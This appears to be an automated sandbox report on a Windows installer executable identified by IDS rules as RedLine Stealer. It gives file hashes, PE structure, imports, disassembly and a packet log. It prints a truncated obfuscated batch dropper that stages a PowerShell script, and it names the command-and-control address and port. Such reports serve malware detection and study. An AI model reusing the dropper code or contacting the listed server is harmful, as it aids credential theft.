                                                                                                                                  Preview:@echo off....setlocal enabledelayedexpansion..set "GOAhpDZonpszAkhZywubLdxcMcqBpeBMJgCgizklWyfKLGQFPR=%userprofile%\QJHJap.ps1"..set HPqLPCrxummxZjOGQuHbQYlifmXNrgmKMxwLvXqZPKfYYyzWVe=%SystemRoot%\SysWow64\WindowsPowerShell\v1.0\powershell.exe..set "LIUFIweVbVclDHhtMvPOrqpqYGTfmgOJRdHuySgMwbrxIstWPJ=%~dp0%~nx0"....set OWkTTXsqBUPpXZPDLTXkQMgYTXAqmaBcpNSRQZusxvxBYSqsXQOWkTTXsqBUPpXZPDLTXkQMgYTXAqmaBcpNSRQZusxvxBYSqsXQ=eYmvoutDGcCZIVgsuzZMVTpdsqZSIFnXqDcQwvPmbUmejxsvqpeYmvoutDGcCZIVgsuzZMVTpdsqZSIFnXqDcQwvPmbUmejxsvqp..set QwYNbJDhGDEDgoaCKCMclSdHmgTnkGNbSnqPMYwNinrNulEQXwQwYNbJDhGDEDgoaCKCMclSdHmgTnkGNbSnqPMYwNinrNulEQXw=eYmvoutDGcCZIVgsuzZMVTpdsqZSIFnXqDcQwvPmbUmejxsvqpeYmvoutDGcCZIVgsuzZMVTpdsqZSIFnXqDcQwvPmbUmejxsvqp-EeYmvoutDGcCZIVgsuzZMVTpdsqZSIFnXqDcQwvPmbUmejxsvqpeYmvoutDGcCZIVgsuzZMVTpdsqZSIFnXqDcQwvPmbUmejxsvqpxeeYmvoutDGcCZIVgsuzZMVTpdsqZSIFnXqDcQwvPmbUmejxsvqpeYmvoutDGcCZIVgsuzZMVTpdsqZSIFnXqDcQwvPmbUmejxsvqpcutieYmvoutDGcCZIVgsuzZMVTpdsqZSIFnXqDcQwvPmbUmejxsvqpeYmvoutDGcCZIV

                                                                                                                                  \Device\Null

                                                                                                                                  Download File
                                                                                                                                  Process:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):27
                                                                                                                                  Entropy (8bit):3.37639561516815
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:3:N/XANAKxcvn:B7KE
                                                                                                                                  MD5:D9C586991FACF81AE3350D1F2468D551
                                                                                                                                  SHA1:4021D00AB6D09D9DEF8964CF7D5B137E2057803D
                                                                                                                                  SHA-256:A04C3131D5D2D6A794281B2525967934811D733BE6DFCE8658AC90F520F8A14F
                                                                                                                                  SHA-512:8D37243809F6AF2D51F844497FBEB4268366D3121A8C76EFE74917C77B5044732ACDEB4638CE47B649AB3A00A8584855015D4DE374B184DB83C0809FA721D421
                                                                                                                                  Malicious:false
                                                                                                                                  Preview: 1 file(s) copied...

                                                                                                                                  Static File Info

                                                                                                                                  General

                                                                                                                                  File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                                                                                  Entropy (8bit):6.8956508991492775
                                                                                                                                  TrID:
                                                                                                                                  • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                                  • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                  • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                  File name:f6FauZ2CEz.exe
                                                                                                                                  File size:372'912 bytes
                                                                                                                                  MD5:1544dbca0efc2c0105dd7d52a21a8891
                                                                                                                                  SHA1:7fbacdb27457829215cd182eab0a4e4bb4379648
                                                                                                                                  SHA256:d5038b0adfdfc36c23dbaafd982bb50bb0e9fc10838e731e10d182d91b28d970
                                                                                                                                  SHA512:2b5cd7536e41c53d6538302c7c8b471e3a5b94926d50833c09c7e737659b8bba4c33ff02521502c90c65c11fea406a05323ff05f4fc529e54d7517653bc9e471
                                                                                                                                  SSDEEP:6144:1fL+oqZLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLPLLLLLLLW:1fLwLLLLLLLLLLLLLLLLLLLLLLLLLLLu
                                                                                                                                  TLSH:7084E1803F62CE15D9650A700B3585EB4F20BC571F6065BA2751FB8DB4F39A3EE0E9A1
                                                                                                                                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1 ..PN..PN..PN.*_...PN..PO.JPN.*_...PN..s~..PN..VH..PN.Rich.PN.........................PE..L...l..d.................j.........

                                                                                                                                  File Icon

                                                                                                                                  Icon Hash:18d0b28283828080

                                                                                                                                  Static PE Info

                                                                                                                                  General

                                                                                                                                  Entrypoint:0x403532
                                                                                                                                  Entrypoint Section:.text
                                                                                                                                  Digitally signed:false
                                                                                                                                  Imagebase:0x400000
                                                                                                                                  Subsystem:windows gui
                                                                                                                                  Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                                                                                                                  DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                                                                  Time Stamp:0x64A0DC6C [Sun Jul 2 02:09:48 2023 UTC]
                                                                                                                                  TLS Callbacks:
                                                                                                                                  CLR (.Net) Version:
                                                                                                                                  OS Version Major:4
                                                                                                                                  OS Version Minor:0
                                                                                                                                  File Version Major:4
                                                                                                                                  File Version Minor:0
                                                                                                                                  Subsystem Version Major:4
                                                                                                                                  Subsystem Version Minor:0
                                                                                                                                  Import Hash:f4639a0b3116c2cfc71144b88a929cfd

                                                                                                                                  Entrypoint Preview

                                                                                                                                  Instruction
                                                                                                                                  sub esp, 000003F8h
                                                                                                                                  push ebp
                                                                                                                                  push esi
                                                                                                                                  push edi
                                                                                                                                  push 00000020h
                                                                                                                                  pop edi
                                                                                                                                  xor ebp, ebp
                                                                                                                                  push 00008001h
                                                                                                                                  mov dword ptr [esp+20h], ebp
                                                                                                                                  mov dword ptr [esp+18h], 0040A2D8h
                                                                                                                                  mov dword ptr [esp+14h], ebp
                                                                                                                                  call dword ptr [004080A4h]
                                                                                                                                  mov esi, dword ptr [004080A8h]
                                                                                                                                  lea eax, dword ptr [esp+34h]
                                                                                                                                  push eax
                                                                                                                                  mov dword ptr [esp+4Ch], ebp
                                                                                                                                  mov dword ptr [esp+0000014Ch], ebp
                                                                                                                                  mov dword ptr [esp+00000150h], ebp
                                                                                                                                  mov dword ptr [esp+38h], 0000011Ch
                                                                                                                                  call esi
                                                                                                                                  test eax, eax
                                                                                                                                  jne 00007F7859215BFAh
                                                                                                                                  lea eax, dword ptr [esp+34h]
                                                                                                                                  mov dword ptr [esp+34h], 00000114h
                                                                                                                                  push eax
                                                                                                                                  call esi
                                                                                                                                  mov ax, word ptr [esp+48h]
                                                                                                                                  mov ecx, dword ptr [esp+62h]
                                                                                                                                  sub ax, 00000053h
                                                                                                                                  add ecx, FFFFFFD0h
                                                                                                                                  neg ax
                                                                                                                                  sbb eax, eax
                                                                                                                                  mov byte ptr [esp+0000014Eh], 00000004h
                                                                                                                                  not eax
                                                                                                                                  and eax, ecx
                                                                                                                                  mov word ptr [esp+00000148h], ax
                                                                                                                                  cmp dword ptr [esp+38h], 0Ah
                                                                                                                                  jnc 00007F7859215BC8h
                                                                                                                                  and word ptr [esp+42h], 0000h
                                                                                                                                  mov eax, dword ptr [esp+40h]
                                                                                                                                  movzx ecx, byte ptr [esp+3Ch]
                                                                                                                                  mov dword ptr [004347B8h], eax
                                                                                                                                  xor eax, eax
                                                                                                                                  mov ah, byte ptr [esp+38h]
                                                                                                                                  movzx eax, ax
                                                                                                                                  or eax, ecx
                                                                                                                                  xor ecx, ecx
                                                                                                                                  mov ch, byte ptr [esp+00000148h]
                                                                                                                                  movzx ecx, cx
                                                                                                                                  shl eax, 10h
                                                                                                                                  or eax, ecx
                                                                                                                                  movzx ecx, byte ptr [esp+0000004Eh]

                                                                                                                                  Rich Headers

                                                                                                                                  Programming Language:
                                                                                                                                  • [EXP] VC++ 6.0 SP5 build 8804

                                                                                                                                  Data Directories

                                                                                                                                  NameVirtual AddressVirtual Size Is in Section
                                                                                                                                  IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                  IMAGE_DIRECTORY_ENTRY_IMPORT0x86080xa0.rdata
                                                                                                                                  IMAGE_DIRECTORY_ENTRY_RESOURCE0x450000x19998.rsrc
                                                                                                                                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                  IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                  IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                                                                                  IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                  IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                  IMAGE_DIRECTORY_ENTRY_IAT0x80000x2a8.rdata
                                                                                                                                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                  IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                                  Sections

                                                                                                                                  NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                  .text0x10000x68d80x6a00742185983fa6320c910f81782213e56fFalse0.6695165094339622data6.478461709868021IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                  .rdata0x80000x14640x1600a995b118b38426885fc6ccaa984c8b7aFalse0.4314630681818182data4.969091535632612IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                  .data0xa0000x2a8180x6009a9bf385a30f1656fc362172b16d9268False0.5247395833333334data4.172601271908501IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                  .ndata0x350000x100000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                  .rsrc0x450000x199980x19a00b1e7d2c3b950e480d836506eefb71360False0.04480754573170732data2.1832299456382547IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                                                                                                                  Resources

                                                                                                                                  NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                  RT_ICON0x452c80x10828Device independent bitmap graphic, 128 x 256 x 32, image size 67584EnglishUnited States0.01134212705548326
                                                                                                                                  RT_ICON0x55af00x4228Device independent bitmap graphic, 64 x 128 x 32, image size 16896EnglishUnited States0.023795465281058102
                                                                                                                                  RT_ICON0x59d180x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9552EnglishUnited States0.03661825726141079
                                                                                                                                  RT_ICON0x5c2c00x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224EnglishUnited States0.06167917448405253
                                                                                                                                  RT_ICON0x5d3680x833PNG image data, 256 x 256, 8-bit/color RGBA, non-interlacedEnglishUnited States0.6174368747022392
                                                                                                                                  RT_ICON0x5dba00x468Device independent bitmap graphic, 16 x 32 x 32, image size 1072EnglishUnited States0.12588652482269502
                                                                                                                                  RT_DIALOG0x5e0080x100dataEnglishUnited States0.5234375
                                                                                                                                  RT_DIALOG0x5e1080x11cdataEnglishUnited States0.6056338028169014
                                                                                                                                  RT_DIALOG0x5e2280x60dataEnglishUnited States0.7291666666666666
                                                                                                                                  RT_GROUP_ICON0x5e2880x5adataEnglishUnited States0.7666666666666667
                                                                                                                                  RT_VERSION0x5e2e80x36cdataEnglishUnited States0.45662100456621
                                                                                                                                  RT_MANIFEST0x5e6580x33eXML 1.0 document, ASCII text, with very long lines (830), with no line terminatorsEnglishUnited States0.5542168674698795

                                                                                                                                  Imports

                                                                                                                                  DLLImport
                                                                                                                                  ADVAPI32.dllRegEnumValueW, RegEnumKeyW, RegQueryValueExW, RegSetValueExW, RegCloseKey, RegDeleteValueW, RegDeleteKeyW, AdjustTokenPrivileges, LookupPrivilegeValueW, OpenProcessToken, RegOpenKeyExW, RegCreateKeyExW
                                                                                                                                  SHELL32.dllSHGetPathFromIDListW, SHBrowseForFolderW, SHGetFileInfoW, SHFileOperationW, ShellExecuteExW
                                                                                                                                  ole32.dllCoCreateInstance, OleUninitialize, OleInitialize, IIDFromString, CoTaskMemFree
                                                                                                                                  COMCTL32.dllImageList_Destroy, ImageList_AddMasked, ImageList_Create
                                                                                                                                  USER32.dllMessageBoxIndirectW, GetDlgItemTextW, SetDlgItemTextW, CreatePopupMenu, AppendMenuW, TrackPopupMenu, OpenClipboard, EmptyClipboard, SetClipboardData, CloseClipboard, IsWindowVisible, CallWindowProcW, GetMessagePos, CheckDlgButton, LoadCursorW, SetCursor, GetSysColor, SetWindowPos, GetWindowLongW, IsWindowEnabled, SetClassLongW, GetSystemMenu, EnableMenuItem, GetWindowRect, ScreenToClient, EndDialog, RegisterClassW, SystemParametersInfoW, CharPrevW, GetClassInfoW, DialogBoxParamW, CharNextW, ExitWindowsEx, DestroyWindow, CreateDialogParamW, SetTimer, SetWindowTextW, PostQuitMessage, SetForegroundWindow, ShowWindow, wsprintfW, SendMessageTimeoutW, FindWindowExW, IsWindow, GetDlgItem, SetWindowLongW, LoadImageW, GetDC, ReleaseDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, GetClientRect, FillRect, DrawTextW, EndPaint, CharNextA, wsprintfA, DispatchMessageW, CreateWindowExW, PeekMessageW, GetSystemMetrics
                                                                                                                                  GDI32.dllGetDeviceCaps, SetBkColor, SelectObject, DeleteObject, CreateBrushIndirect, CreateFontIndirectW, SetBkMode, SetTextColor
                                                                                                                                  KERNEL32.dlllstrcmpiA, CreateFileW, GetTempFileNameW, RemoveDirectoryW, CreateProcessW, CreateDirectoryW, GetLastError, CreateThread, GlobalLock, GlobalUnlock, GetDiskFreeSpaceW, WideCharToMultiByte, lstrcpynW, lstrlenW, SetErrorMode, GetVersionExW, GetCommandLineW, GetTempPathW, GetWindowsDirectoryW, WriteFile, CopyFileW, ExitProcess, GetCurrentProcess, GetModuleFileNameW, GetFileSize, GetTickCount, Sleep, SetFileAttributesW, GetFileAttributesW, SetCurrentDirectoryW, MoveFileW, GetFullPathNameW, GetShortPathNameW, SearchPathW, CompareFileTime, SetFileTime, CloseHandle, lstrcmpiW, lstrcmpW, ExpandEnvironmentStringsW, GlobalFree, GlobalAlloc, GetModuleHandleW, LoadLibraryExW, FreeLibrary, WritePrivateProfileStringW, GetPrivateProfileStringW, lstrlenA, MultiByteToWideChar, ReadFile, SetFilePointer, FindClose, FindNextFileW, FindFirstFileW, DeleteFileW, MulDiv, lstrcpyA, MoveFileExW, lstrcatW, GetSystemDirectoryW, GetProcAddress, GetModuleHandleA, GetExitCodeProcess, WaitForSingleObject, SetEnvironmentVariableW

                                                                                                                                  Possible Origin

                                                                                                                                  Language of compilation systemCountry where language is spokenMap
                                                                                                                                  EnglishUnited States

                                                                                                                                  Network Behavior

                                                                                                                                  Snort IDS Alerts

                                                                                                                                  TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                                                                                  04/26/24-02:42:01.151356TCP2046045ET TROJAN [ANY.RUN] RedLine Stealer/MetaStealer Family Related (MC-NMF Authorization)4973018418192.168.2.45.42.92.179
                                                                                                                                  04/26/24-02:42:15.800330TCP2043231ET TROJAN Redline Stealer TCP CnC Activity4973018418192.168.2.45.42.92.179
                                                                                                                                  04/26/24-02:42:01.413026TCP2043234ET MALWARE Redline Stealer TCP CnC - Id1Response18418497305.42.92.179192.168.2.4
                                                                                                                                  04/26/24-02:42:06.716638TCP2046056ET TROJAN Redline Stealer/MetaStealer Family Activity (Response)18418497305.42.92.179192.168.2.4

                                                                                                                                  Network Port Distribution

                                                                                                                                  TCP Packets

                                                                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                                                                  Apr 26, 2024 02:42:00.592068911 CEST4973018418192.168.2.45.42.92.179
                                                                                                                                  Apr 26, 2024 02:42:00.853523970 CEST18418497305.42.92.179192.168.2.4
                                                                                                                                  Apr 26, 2024 02:42:00.853630066 CEST4973018418192.168.2.45.42.92.179
                                                                                                                                  Apr 26, 2024 02:42:00.861607075 CEST4973018418192.168.2.45.42.92.179
                                                                                                                                  Apr 26, 2024 02:42:01.122984886 CEST18418497305.42.92.179192.168.2.4
                                                                                                                                  Apr 26, 2024 02:42:01.151355982 CEST4973018418192.168.2.45.42.92.179
                                                                                                                                  Apr 26, 2024 02:42:01.413026094 CEST18418497305.42.92.179192.168.2.4
                                                                                                                                  Apr 26, 2024 02:42:01.465230942 CEST4973018418192.168.2.45.42.92.179
                                                                                                                                  Apr 26, 2024 02:42:06.453449965 CEST4973018418192.168.2.45.42.92.179
                                                                                                                                  Apr 26, 2024 02:42:06.716638088 CEST18418497305.42.92.179192.168.2.4
                                                                                                                                  Apr 26, 2024 02:42:06.716732979 CEST18418497305.42.92.179192.168.2.4
                                                                                                                                  Apr 26, 2024 02:42:06.716774940 CEST18418497305.42.92.179192.168.2.4
                                                                                                                                  Apr 26, 2024 02:42:06.716793060 CEST4973018418192.168.2.45.42.92.179
                                                                                                                                  Apr 26, 2024 02:42:06.716815948 CEST18418497305.42.92.179192.168.2.4
                                                                                                                                  Apr 26, 2024 02:42:06.716861963 CEST4973018418192.168.2.45.42.92.179
                                                                                                                                  Apr 26, 2024 02:42:06.977819920 CEST18418497305.42.92.179192.168.2.4
                                                                                                                                  Apr 26, 2024 02:42:07.027604103 CEST4973018418192.168.2.45.42.92.179
                                                                                                                                  Apr 26, 2024 02:42:07.699443102 CEST4973018418192.168.2.45.42.92.179
                                                                                                                                  Apr 26, 2024 02:42:07.964498997 CEST18418497305.42.92.179192.168.2.4
                                                                                                                                  Apr 26, 2024 02:42:08.011982918 CEST4973018418192.168.2.45.42.92.179
                                                                                                                                  Apr 26, 2024 02:42:08.039150953 CEST4973018418192.168.2.45.42.92.179
                                                                                                                                  Apr 26, 2024 02:42:08.300539970 CEST18418497305.42.92.179192.168.2.4
                                                                                                                                  Apr 26, 2024 02:42:08.309715986 CEST4973018418192.168.2.45.42.92.179
                                                                                                                                  Apr 26, 2024 02:42:08.571232080 CEST18418497305.42.92.179192.168.2.4
                                                                                                                                  Apr 26, 2024 02:42:08.611561060 CEST4973018418192.168.2.45.42.92.179
                                                                                                                                  Apr 26, 2024 02:42:08.873014927 CEST18418497305.42.92.179192.168.2.4
                                                                                                                                  Apr 26, 2024 02:42:08.918240070 CEST4973018418192.168.2.45.42.92.179
                                                                                                                                  Apr 26, 2024 02:42:08.996293068 CEST4973018418192.168.2.45.42.92.179
                                                                                                                                  Apr 26, 2024 02:42:09.257664919 CEST18418497305.42.92.179192.168.2.4
                                                                                                                                  Apr 26, 2024 02:42:09.259938955 CEST4973018418192.168.2.45.42.92.179
                                                                                                                                  Apr 26, 2024 02:42:09.522983074 CEST18418497305.42.92.179192.168.2.4
                                                                                                                                  Apr 26, 2024 02:42:09.547143936 CEST4973018418192.168.2.45.42.92.179
                                                                                                                                  Apr 26, 2024 02:42:09.808466911 CEST18418497305.42.92.179192.168.2.4
                                                                                                                                  Apr 26, 2024 02:42:09.809868097 CEST4973018418192.168.2.45.42.92.179
                                                                                                                                  Apr 26, 2024 02:42:10.071161032 CEST18418497305.42.92.179192.168.2.4
                                                                                                                                  Apr 26, 2024 02:42:10.096483946 CEST4973018418192.168.2.45.42.92.179
                                                                                                                                  Apr 26, 2024 02:42:10.357877016 CEST18418497305.42.92.179192.168.2.4
                                                                                                                                  Apr 26, 2024 02:42:10.402601004 CEST4973018418192.168.2.45.42.92.179
                                                                                                                                  Apr 26, 2024 02:42:10.523066044 CEST4973018418192.168.2.45.42.92.179
                                                                                                                                  Apr 26, 2024 02:42:10.784523010 CEST18418497305.42.92.179192.168.2.4
                                                                                                                                  Apr 26, 2024 02:42:10.784593105 CEST4973018418192.168.2.45.42.92.179
                                                                                                                                  Apr 26, 2024 02:42:10.784729004 CEST18418497305.42.92.179192.168.2.4
                                                                                                                                  Apr 26, 2024 02:42:10.785135984 CEST18418497305.42.92.179192.168.2.4
                                                                                                                                  Apr 26, 2024 02:42:10.785366058 CEST18418497305.42.92.179192.168.2.4
                                                                                                                                  Apr 26, 2024 02:42:10.785589933 CEST18418497305.42.92.179192.168.2.4
                                                                                                                                  Apr 26, 2024 02:42:11.045692921 CEST18418497305.42.92.179192.168.2.4
                                                                                                                                  Apr 26, 2024 02:42:11.045986891 CEST18418497305.42.92.179192.168.2.4
                                                                                                                                  Apr 26, 2024 02:42:11.046602011 CEST18418497305.42.92.179192.168.2.4
                                                                                                                                  Apr 26, 2024 02:42:11.090102911 CEST4973018418192.168.2.45.42.92.179
                                                                                                                                  Apr 26, 2024 02:42:11.119832993 CEST4973018418192.168.2.45.42.92.179
                                                                                                                                  Apr 26, 2024 02:42:11.381148100 CEST18418497305.42.92.179192.168.2.4
                                                                                                                                  Apr 26, 2024 02:42:11.388457060 CEST4973018418192.168.2.45.42.92.179
                                                                                                                                  Apr 26, 2024 02:42:11.649406910 CEST18418497305.42.92.179192.168.2.4
                                                                                                                                  Apr 26, 2024 02:42:11.649580002 CEST18418497305.42.92.179192.168.2.4
                                                                                                                                  Apr 26, 2024 02:42:11.649750948 CEST18418497305.42.92.179192.168.2.4
                                                                                                                                  Apr 26, 2024 02:42:11.650217056 CEST18418497305.42.92.179192.168.2.4
                                                                                                                                  Apr 26, 2024 02:42:11.699465036 CEST4973018418192.168.2.45.42.92.179
                                                                                                                                  Apr 26, 2024 02:42:11.845092058 CEST4973018418192.168.2.45.42.92.179
                                                                                                                                  Apr 26, 2024 02:42:12.106098890 CEST18418497305.42.92.179192.168.2.4
                                                                                                                                  Apr 26, 2024 02:42:12.106194019 CEST4973018418192.168.2.45.42.92.179
                                                                                                                                  Apr 26, 2024 02:42:12.106408119 CEST18418497305.42.92.179192.168.2.4
                                                                                                                                  Apr 26, 2024 02:42:12.106513023 CEST4973018418192.168.2.45.42.92.179
                                                                                                                                  Apr 26, 2024 02:42:12.106518030 CEST18418497305.42.92.179192.168.2.4
                                                                                                                                  Apr 26, 2024 02:42:12.106640100 CEST18418497305.42.92.179192.168.2.4
                                                                                                                                  Apr 26, 2024 02:42:12.106652975 CEST4973018418192.168.2.45.42.92.179
                                                                                                                                  Apr 26, 2024 02:42:12.106842041 CEST4973018418192.168.2.45.42.92.179
                                                                                                                                  Apr 26, 2024 02:42:12.107300997 CEST18418497305.42.92.179192.168.2.4
                                                                                                                                  Apr 26, 2024 02:42:12.107350111 CEST18418497305.42.92.179192.168.2.4
                                                                                                                                  Apr 26, 2024 02:42:12.107403040 CEST18418497305.42.92.179192.168.2.4
                                                                                                                                  Apr 26, 2024 02:42:12.107410908 CEST4973018418192.168.2.45.42.92.179
                                                                                                                                  Apr 26, 2024 02:42:12.107455015 CEST4973018418192.168.2.45.42.92.179
                                                                                                                                  Apr 26, 2024 02:42:12.107513905 CEST18418497305.42.92.179192.168.2.4
                                                                                                                                  Apr 26, 2024 02:42:12.107572079 CEST4973018418192.168.2.45.42.92.179
                                                                                                                                  Apr 26, 2024 02:42:12.107593060 CEST18418497305.42.92.179192.168.2.4
                                                                                                                                  Apr 26, 2024 02:42:12.107639074 CEST4973018418192.168.2.45.42.92.179
                                                                                                                                  Apr 26, 2024 02:42:12.107832909 CEST18418497305.42.92.179192.168.2.4
                                                                                                                                  Apr 26, 2024 02:42:12.107894897 CEST4973018418192.168.2.45.42.92.179
                                                                                                                                  Apr 26, 2024 02:42:12.108038902 CEST18418497305.42.92.179192.168.2.4
                                                                                                                                  Apr 26, 2024 02:42:12.108108044 CEST4973018418192.168.2.45.42.92.179
                                                                                                                                  Apr 26, 2024 02:42:12.108201981 CEST18418497305.42.92.179192.168.2.4
                                                                                                                                  Apr 26, 2024 02:42:12.108319044 CEST18418497305.42.92.179192.168.2.4
                                                                                                                                  Apr 26, 2024 02:42:12.108398914 CEST4973018418192.168.2.45.42.92.179
                                                                                                                                  Apr 26, 2024 02:42:12.108611107 CEST18418497305.42.92.179192.168.2.4
                                                                                                                                  Apr 26, 2024 02:42:12.108665943 CEST4973018418192.168.2.45.42.92.179
                                                                                                                                  Apr 26, 2024 02:42:12.166327953 CEST18418497305.42.92.179192.168.2.4
                                                                                                                                  Apr 26, 2024 02:42:12.367150068 CEST18418497305.42.92.179192.168.2.4
                                                                                                                                  Apr 26, 2024 02:42:12.367228031 CEST18418497305.42.92.179192.168.2.4
                                                                                                                                  Apr 26, 2024 02:42:12.367310047 CEST18418497305.42.92.179192.168.2.4
                                                                                                                                  Apr 26, 2024 02:42:12.367492914 CEST18418497305.42.92.179192.168.2.4
                                                                                                                                  Apr 26, 2024 02:42:12.367763996 CEST18418497305.42.92.179192.168.2.4
                                                                                                                                  Apr 26, 2024 02:42:12.367821932 CEST18418497305.42.92.179192.168.2.4
                                                                                                                                  Apr 26, 2024 02:42:12.367854118 CEST18418497305.42.92.179192.168.2.4
                                                                                                                                  Apr 26, 2024 02:42:12.367954016 CEST18418497305.42.92.179192.168.2.4
                                                                                                                                  Apr 26, 2024 02:42:12.368024111 CEST4973018418192.168.2.45.42.92.179
                                                                                                                                  Apr 26, 2024 02:42:12.368136883 CEST4973018418192.168.2.45.42.92.179
                                                                                                                                  Apr 26, 2024 02:42:12.368233919 CEST18418497305.42.92.179192.168.2.4
                                                                                                                                  Apr 26, 2024 02:42:12.368454933 CEST18418497305.42.92.179192.168.2.4
                                                                                                                                  Apr 26, 2024 02:42:12.368634939 CEST18418497305.42.92.179192.168.2.4
                                                                                                                                  Apr 26, 2024 02:42:12.368825912 CEST18418497305.42.92.179192.168.2.4
                                                                                                                                  Apr 26, 2024 02:42:12.368999958 CEST18418497305.42.92.179192.168.2.4
                                                                                                                                  Apr 26, 2024 02:42:12.369132996 CEST18418497305.42.92.179192.168.2.4
                                                                                                                                  Apr 26, 2024 02:42:12.369164944 CEST18418497305.42.92.179192.168.2.4
                                                                                                                                  Apr 26, 2024 02:42:12.369343996 CEST18418497305.42.92.179192.168.2.4
                                                                                                                                  Apr 26, 2024 02:42:12.369436979 CEST18418497305.42.92.179192.168.2.4
                                                                                                                                  Apr 26, 2024 02:42:12.369534969 CEST18418497305.42.92.179192.168.2.4
                                                                                                                                  Apr 26, 2024 02:42:12.369576931 CEST18418497305.42.92.179192.168.2.4
                                                                                                                                  Apr 26, 2024 02:42:12.369755030 CEST18418497305.42.92.179192.168.2.4
                                                                                                                                  Apr 26, 2024 02:42:12.369929075 CEST18418497305.42.92.179192.168.2.4
                                                                                                                                  Apr 26, 2024 02:42:12.370126009 CEST4973018418192.168.2.45.42.92.179
                                                                                                                                  Apr 26, 2024 02:42:12.370181084 CEST4973018418192.168.2.45.42.92.179
                                                                                                                                  Apr 26, 2024 02:42:12.629314899 CEST18418497305.42.92.179192.168.2.4
                                                                                                                                  Apr 26, 2024 02:42:12.629378080 CEST4973018418192.168.2.45.42.92.179
                                                                                                                                  Apr 26, 2024 02:42:12.629904985 CEST18418497305.42.92.179192.168.2.4
                                                                                                                                  Apr 26, 2024 02:42:12.630080938 CEST18418497305.42.92.179192.168.2.4
                                                                                                                                  Apr 26, 2024 02:42:12.630486965 CEST18418497305.42.92.179192.168.2.4
                                                                                                                                  Apr 26, 2024 02:42:12.630934000 CEST18418497305.42.92.179192.168.2.4
                                                                                                                                  Apr 26, 2024 02:42:12.630989075 CEST18418497305.42.92.179192.168.2.4
                                                                                                                                  Apr 26, 2024 02:42:12.631241083 CEST18418497305.42.92.179192.168.2.4
                                                                                                                                  Apr 26, 2024 02:42:12.631469965 CEST18418497305.42.92.179192.168.2.4
                                                                                                                                  Apr 26, 2024 02:42:12.631722927 CEST18418497305.42.92.179192.168.2.4
                                                                                                                                  Apr 26, 2024 02:42:12.632283926 CEST18418497305.42.92.179192.168.2.4
                                                                                                                                  Apr 26, 2024 02:42:12.632386923 CEST18418497305.42.92.179192.168.2.4
                                                                                                                                  Apr 26, 2024 02:42:12.632504940 CEST18418497305.42.92.179192.168.2.4
                                                                                                                                  Apr 26, 2024 02:42:12.632651091 CEST18418497305.42.92.179192.168.2.4
                                                                                                                                  Apr 26, 2024 02:42:12.632685900 CEST18418497305.42.92.179192.168.2.4
                                                                                                                                  Apr 26, 2024 02:42:12.632931948 CEST18418497305.42.92.179192.168.2.4
                                                                                                                                  Apr 26, 2024 02:42:12.633238077 CEST18418497305.42.92.179192.168.2.4
                                                                                                                                  Apr 26, 2024 02:42:12.633502007 CEST18418497305.42.92.179192.168.2.4
                                                                                                                                  Apr 26, 2024 02:42:12.633673906 CEST18418497305.42.92.179192.168.2.4
                                                                                                                                  Apr 26, 2024 02:42:12.633867025 CEST18418497305.42.92.179192.168.2.4
                                                                                                                                  Apr 26, 2024 02:42:12.634088039 CEST18418497305.42.92.179192.168.2.4
                                                                                                                                  Apr 26, 2024 02:42:12.634488106 CEST18418497305.42.92.179192.168.2.4
                                                                                                                                  Apr 26, 2024 02:42:12.634643078 CEST18418497305.42.92.179192.168.2.4
                                                                                                                                  Apr 26, 2024 02:42:12.634840965 CEST18418497305.42.92.179192.168.2.4
                                                                                                                                  Apr 26, 2024 02:42:12.634951115 CEST4973018418192.168.2.45.42.92.179
